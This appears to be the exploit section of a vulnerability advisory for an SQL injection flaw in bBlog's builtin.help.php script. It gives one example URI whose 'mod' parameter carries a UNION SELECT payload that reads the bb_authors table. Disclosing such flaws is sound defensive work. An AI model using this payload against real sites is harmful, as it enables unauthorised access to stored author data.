• info
• discussion
• exploit
• solution
• references

bBlog 'builtin.help.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com//bblog_plugins/builtin.help.php?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--